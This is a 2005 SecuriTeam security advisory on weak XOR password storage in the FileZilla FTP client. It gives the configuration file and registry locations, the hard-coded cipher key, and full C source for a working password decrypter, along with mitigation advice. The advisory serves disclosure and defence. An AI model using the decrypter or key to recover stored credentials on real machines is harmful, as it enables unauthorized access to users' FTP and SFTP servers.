[NT] FileZilla Weak Password Encryption

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  FileZilla Weak Password Encryption
------------------------------------------------------------------------


SUMMARY

" <http://filezilla.sourceforge.net/> FileZilla is a fast and reliable FTP 
client and server with lots of useful features and an intuitive 
interface." The FileZilla client stores passwords using weak XOR 
substitution with static cypher key.

DETAILS

Vulnerable Systems:
 * FileZilla versions 2.2.14b and 2.2.15

FileZilla saves configuration settings in two different locations:
 * In an XML file
 * In the Windows registry

The method used to save configuration settings depends on the preferences 
used by the user during the installation of FileZilla. Either way, all 
configuration settings are stored in cleartext, EXCEPT for the password. 
However, the password is stored using very weak XOR "encryption" which can 
be easily reversed.

There exists a problem in the way the XOR encryption is implemented 
because the same cipher key is always used. This key is hard-coded, which 
means that anyone can analyze the source code of the application and find 
it. Of course, this wouldn't be so easy if FileZilla wasn't an open source 
application.

Once the key is known, an attacker can use it to decrypt the password back 
to its cleartext form. Because the XOR cryptographic algorithm used is 
symmetric, the same key is used for both, encrypting and decrypting.

As mentioned before, the rest of the configuration settings are all in 
cleartext. Some information that would be useful for an attacker includes 
hostname of the server to connect to, default port, and username.

If successfully exploited, this vulnerability will allow an attacker to 
access FTP (or SFTP) servers with the privileges of the user whose 
configuration settings were stolen from.

In practice, this vulnerability could be exploited after a machine has 
been compromised, or by fooling the user into executing malicious code. 
Such code could dump the configuration settings, decrypt the password/s 
and sends them all to the attacker.

It is common to see many popular trojans out there that exploit weak 
encryption vulnerabilities of this type. These trojans dump the 
credentials of popular applications such as Internet Explorer, VNC or even 
dialup connections. FileZilla could be the next added application in the 
list of all those trojans with password-dumping features.

This vulnerability is somehow similar to the one found by Conde Vampiro in 
VNC 3 back in 1999. It's similar because in both cases we find an open 
source application using a fixed cipher key to decrypt passwords. Thus, 
making trivial to find the key.

For more information on Conde Vampiro's findings visit:  
<http://www.securiteam.com/securitynews/3P5QERFQ0Q.html> 
http://www.securiteam.com/securitynews/3P5QERFQ0Q.html

The XML configuration file is found at: 
%programfiles%\FileZilla\FileZilla.xml
The configuration settings are saved in the registry in:
Hive:   HKEY_CURRENT_USER
Key:    Software\FileZilla\Site Manager\[site_name]\
Where [site_name] is the name given to the connection by the user.
The password is saved in the previous key as a value with the following 
properties:
Value:  Pass
Type:   REG_SZ (string terminated in NULL)

The cipher key can be found in Crypt.cpp and its value is: 
FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ

Solution:
Choose "Use secure mode" during the installation (this disables FileZilla 
from saving passwords), lockdown your client machines where the FileZilla 
client is installed, or update to a patched version which fixes this issue 
(if available).

Password Decrypter Code:
/*

Filename: filezilla-pwdec.c
Title: FileZilla Client - Weakly encrypted password exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 8th August, 2005
License: GPL
email: m123303[-a-t-]richmond.ac.uk
homepage: www.ikwt.com (In Knowledge We Trust)
  www.adrianpv.com

Description: this tool asks the user for the "encrypted" password and
  computes the cleartext version of the password

Other info: compile as a Win32 console application project in Visual C++

Copyright (C) 2005 pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301, USA.

*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cypher key)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE: decimal values representing ASCII chars,
// every three digits becomes one ASCII char
// e.g.: 042040063063
//POST: ASCII chars are copied back to buff[]
// e.g.: *(??
// the length of the new string is returned
int digit2char(char buff[])
{
 char tmp_buff[4], ascii_buff[MAX_SIZE];
 unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
 for(i=0,j=0;i<strlen(buff);i+=3,++j)
 {
  tmp_buff[0]=buff[i];
  tmp_buff[1]=buff[i+1];
  tmp_buff[2]=buff[i+2];
  tmp_buff[3]='\0';
  
  n=atoi(tmp_buff);
  ascii_buff[j]=(char)n;
 }
 ascii_buff[j]='\0';
 printf("ascii_buff:%s\n", ascii_buff);
 strcpy(buff, ascii_buff);

 return len;
}

//PRE: buffer containing ASCII chars of cypher
// (rather than their numberic ASCII value)
//POST:length of cleartext password is returned
unsigned int decrypt(char buff[])
{
 unsigned int i, pos, len;
 
 len=digit2char(buff);
 pos=len%strlen(m_key);

 for (i=0;i<len;i++)
  buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];

 return len;
}

int main(void)
{
 char cypher[MAX_SIZE];
 unsigned int len=0,i=0;

 printf("Enter cypher (encrypted password)\ne.g.: 120125125112000\n->");
 scanf("%s", cypher);
 if(strlen(cypher)%3==0)
 {
  len=decrypt(cypher);
  printf("cleartext password:");
  for(i=0;i<len;++i)
   printf("%c",cypher[i]);
  printf("\n");
 }
 else
 {
  printf("You didn't enter a valid cypher!\n");
  printf("It should be a numeric value whose length is multiple of 3\n");
 }

 printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
 Sleep(SLEEP_TIME);
 return 0;
}

Complete Proof of concept code can be found at:  
<http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip> 
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip


ADDITIONAL INFORMATION

The information has been provided by  <mailto:m123303@xxxxxxxxxxxxxx> 
pagvac (Adrian Pastor).
The original article can be found at:  
<http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip> 
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@xxxxxxxxxxxxxx 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@xxxxxxxxxxxxxx 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.